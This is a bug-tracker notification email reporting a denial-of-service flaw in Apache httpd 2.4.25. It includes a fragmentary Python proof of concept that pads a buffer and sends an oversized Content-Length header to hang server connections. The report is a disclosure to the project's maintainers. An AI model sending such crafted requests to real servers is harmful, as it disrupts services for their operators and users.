https://bz.apache.org/bugzilla/show_bug.cgi?id=60860

            Bug ID: 60860
           Summary: Apache httpd Dos Bug
           Product: Apache httpd-2
           Version: 2.4.25
          Hardware: PC
            Status: NEW
          Severity: normal
          Priority: P2
         Component: All
          Assignee: [email protected]
          Reporter: [email protected]
  Target Milestone: ---

Created attachment 34819
  --> https://bz.apache.org/bugzilla/attachment.cgi?id=34819&action=edit
poc

for num in range(2000):
            buf += "AAAAA"

        headers = {'Content-Length': str(0xFFFFFFFFFFFF),'Content-Type':
'text/html'}

if buffer is over 10000 size,allow to set arbitrary Content-Length. so looping
program and slow connection or dead connection.

try to run poc.

Thanks.

-- 
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]

Reply via email to